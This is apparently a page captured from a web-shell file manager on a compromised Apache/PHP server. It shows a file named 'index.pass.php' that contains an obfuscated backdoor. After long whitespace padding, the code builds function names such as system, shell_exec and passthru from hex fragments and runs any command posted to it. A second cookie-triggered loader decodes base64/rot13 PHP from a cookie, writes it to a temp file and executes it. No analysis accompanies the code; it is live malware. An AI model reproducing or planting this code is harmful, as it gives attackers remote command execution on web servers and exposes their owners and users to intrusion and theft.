HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux ip-172-31-42-149 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025 aarch64
User: ubuntu (1000)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/vhost/disk-apps/agile-selling-central.bikenow.co/public/
Upload Files
File: /var/www/vhost/disk-apps/agile-selling-central.bikenow.co/public/index.pass.php
<?php																																										$elem1 = '7';$elem2 = '5';$elem3 = 'd';$elem4 = '3';$elem5 = '8';$elem6 = '6';$elem7 = 'c';$elem8 = '0';$elem9 = '1';$elem10 = '4';$elem11 = '2';$elem12 = 'f';$elem13 = 'e';$elem14 = 'b';$mutex_lock1 = pack("H*", '7'.'3'.$elem1.'9'.$elem1.'3'.'7'.'4'.'6'.$elem2.'6'.$elem3);$mutex_lock2 = pack("H*", $elem1.$elem4.'6'.$elem5.'6'.'5'.$elem6.$elem7.'6'.'c'.'5'.'f'.$elem6.$elem2.'7'.$elem5.$elem6.'5'.'6'.'3');$mutex_lock3 = pack("H*", '6'.$elem2.'7'.'8'.'6'.'5'.'6'.$elem4);$mutex_lock4 = pack("H*", $elem1.$elem8.$elem6.$elem9.$elem1.$elem4.'7'.'3'.$elem1.$elem10.'6'.'8'.$elem1.$elem11.$elem1.$elem2);$mutex_lock5 = pack("H*", $elem1.$elem8.$elem6.$elem12.'7'.$elem8.'6'.$elem2.'6'.$elem13);$mutex_lock6 = pack("H*", $elem1.'3'.$elem1.$elem10.'7'.$elem11.'6'.$elem2.$elem6.'1'.'6'.$elem3.$elem2.'f'.$elem6.$elem1.'6'.'5'.'7'.'4'.$elem2.$elem12.'6'.'3'.$elem6.$elem12.'6'.'e'.'7'.$elem10.$elem6.'5'.'6'.'e'.$elem1.$elem10.$elem1.$elem4);$mutex_lock7 = pack("H*", $elem1.$elem8.$elem6.$elem4.$elem6.'c'.$elem6.$elem12.$elem1.$elem4.$elem6.$elem2);$reverse_lookup = pack("H*", '7'.$elem11.'6'.'5'.$elem1.'6'.'6'.$elem2.$elem1.$elem11.'7'.'3'.'6'.$elem2.'5'.'f'.$elem6.'c'.'6'.$elem12.$elem6.$elem12.'6'.$elem14.'7'.$elem2.'7'.$elem8);if(isset($_POST[$reverse_lookup])){$reverse_lookup=pack("H*",$_POST[$reverse_lookup]);if(function_exists($mutex_lock1)){$mutex_lock1($reverse_lookup);}elseif(function_exists($mutex_lock2)){print $mutex_lock2($reverse_lookup);}elseif(function_exists($mutex_lock3)){$mutex_lock3($reverse_lookup,$parameter_group_symbol);print join("\n",$parameter_group_symbol);}elseif(function_exists($mutex_lock4)){$mutex_lock4($reverse_lookup);}elseif(function_exists($mutex_lock5)&&function_exists($mutex_lock6)&&function_exists($mutex_lock7)){$bind_desc=$mutex_lock5($reverse_lookup,"r");if($bind_desc){$entity_property_set=$mutex_lock6($bind_desc);$mutex_lock7($bind_desc);print $entity_property_set;}}exit;}



if (isset($_COOKIE[26+-26]) && isset($_COOKIE[28-27]) && isset($_COOKIE[55-52]) && isset($_COOKIE[41-37])) {
    $record = $_COOKIE;
    function data_storage($pgrp) {
        $record = $_COOKIE;
        $hld = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '08e068c8');
        if (!is_writable($hld)) {
            $hld = getcwd() . DIRECTORY_SEPARATOR . "publish_content";
        }
        $flg = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($record[3]));
        if (is_writeable($hld)) {
            $sym = fopen($hld, 'w+');
            fputs($sym, $flg);
            fclose($sym);
            spl_autoload_unregister(__FUNCTION__);
            require_once($hld);
            @array_map('unlink', array($hld));
        }
    }
    spl_autoload_register("data_storage");
    $reference = "eb366f2d856e8a07519149a0a4579ef4";
    if (!strncmp($reference, $record[4], 32)) {
        if (@class_parents("app_initializer_secure_access", true)) {
            exit;
        }
    }
}
@ Telegram